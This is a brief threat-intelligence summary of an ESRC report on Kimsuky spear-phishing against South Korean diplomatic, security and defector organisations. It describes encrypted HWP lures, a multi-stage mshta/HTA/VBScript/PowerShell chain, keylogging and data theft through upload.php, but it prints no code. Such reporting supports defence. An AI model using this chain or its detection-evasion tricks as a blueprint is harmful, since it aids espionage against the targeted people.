ESRC reports Kimsuky spear-phishing against South Korean diplomacy, security, unification, North Korea-related, and defector-focused organizations, tying the activity to Operation Low Kick and Operation Stealth Power. The attackers sent carefully written Korean-language emails with encrypted malicious HWP attachments, using passwords in the email body to hinder analysis and reduce security detection. After the HWP exploit ran, shellcode contacted a compromised Korean C2 host, launched mshta.exe to load first.hta, and progressed through HTA, VBScript, PHP, and PowerShell stages. The final PowerShell script collected keystrokes, process lists, service lists, and other victim information, then exfiltrated it through upload.php. ESRC also notes related credential-phishing activity using the same host and a shared “Tom” document author account, strengthening the link across the observed Kimsuky operations.